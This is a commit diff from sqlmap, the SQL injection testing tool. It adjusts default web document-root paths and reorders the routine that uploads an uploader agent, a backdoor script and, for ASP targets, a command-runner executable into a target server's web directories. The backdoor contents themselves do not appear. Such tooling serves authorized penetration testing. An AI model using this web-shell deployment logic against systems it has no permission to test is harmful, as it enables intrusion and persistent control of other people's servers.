important update regarding default directories

This commit is contained in:
Miroslav Stampar 2010-02-25 15:22:41 +00:00
parent a10adcfe08
commit 0913d700a8
2 changed files with 19 additions and 14 deletions

View File

@ -222,12 +222,15 @@ def getHtmlErrorFp():
return htmlParsed return htmlParsed
def getDocRoot(): def getDocRoot(webApi=None):
docRoot = None docRoot = None
pagePath = directoryPath(conf.path) pagePath = directoryPath(conf.path)
if kb.os == "Windows": if kb.os == "Windows":
defaultDocRoot = "C:/Inetpub/wwwroot/" if webApi == "php":
defaultDocRoot = "C:/xampp/htdocs/"
else:
defaultDocRoot = "C:/Inetpub/wwwroot/"
else: else:
defaultDocRoot = "/var/www/" defaultDocRoot = "/var/www/"
@ -270,11 +273,14 @@ def getDocRoot():
return docRoot return docRoot
def getDirs(): def getDirs(webApi=None):
directories = set() directories = set()
if kb.os == "Windows": if kb.os == "Windows":
defaultDirs = ["C:/Inetpub/wwwroot/", "C:/xampp/htdocs/"] if webApi == "php":
defaultDirs = ["C:/xampp/htdocs/"]
else:
defaultDirs = ["C:/Inetpub/wwwroot/"]
else: else:
defaultDirs = ["/var/www/"] defaultDirs = ["/var/www/"]

View File

@ -131,11 +131,6 @@ class Web:
self.checkDbmsOs() self.checkDbmsOs()
kb.docRoot = getDocRoot()
directories = getDirs()
directories = list(directories)
directories.sort()
infoMsg = "trying to upload the uploader agent" infoMsg = "trying to upload the uploader agent"
logger.info(infoMsg) logger.info(infoMsg)
@ -167,6 +162,11 @@ class Web:
elif int(choice) < 1 or int(choice) > 3: elif int(choice) < 1 or int(choice) > 3:
logger.warn("invalid value, it must be 1 or 3") logger.warn("invalid value, it must be 1 or 3")
kb.docRoot = getDocRoot(self.webApi)
directories = getDirs(self.webApi)
directories = list(directories)
directories.sort()
backdoorName = "tmpb%s.%s" % (randomStr(4), self.webApi) backdoorName = "tmpb%s.%s" % (randomStr(4), self.webApi)
backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName) backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName)
originalBackdoorContent = backdoorContent = backdoorStream.read() originalBackdoorContent = backdoorContent = backdoorStream.read()
@ -178,11 +178,10 @@ class Web:
# Upload the uploader agent # Upload the uploader agent
self.__webFileInject(uploaderContent, uploaderName, directory) self.__webFileInject(uploaderContent, uploaderName, directory)
requestDir = ntToPosixSlashes(directory).replace(ntToPosixSlashes(kb.docRoot), "/") requestDir = ntToPosixSlashes(directory).replace(ntToPosixSlashes(kb.docRoot), "/").replace("//", "/")
if isWindowsPath(requestDir): if isWindowsPath(requestDir):
requestDir = requestDir[2:] requestDir = requestDir[2:]
while requestDir.find('//') != -1: requestDir = normalizePath(requestDir)
requestDir = requestDir.replace('//', '/')
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir) self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir)
self.webUploaderUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), uploaderName) self.webUploaderUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), uploaderName)
@ -203,9 +202,9 @@ class Web:
if self.webApi == "asp": if self.webApi == "asp":
runcmdName = "tmpe%s.exe" % randomStr(4) runcmdName = "tmpe%s.exe" % randomStr(4)
runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName) runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage) match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
if match: if match:
backdoorDirectory = match.group(1) backdoorDirectory = match.group(1)
else: else:
continue continue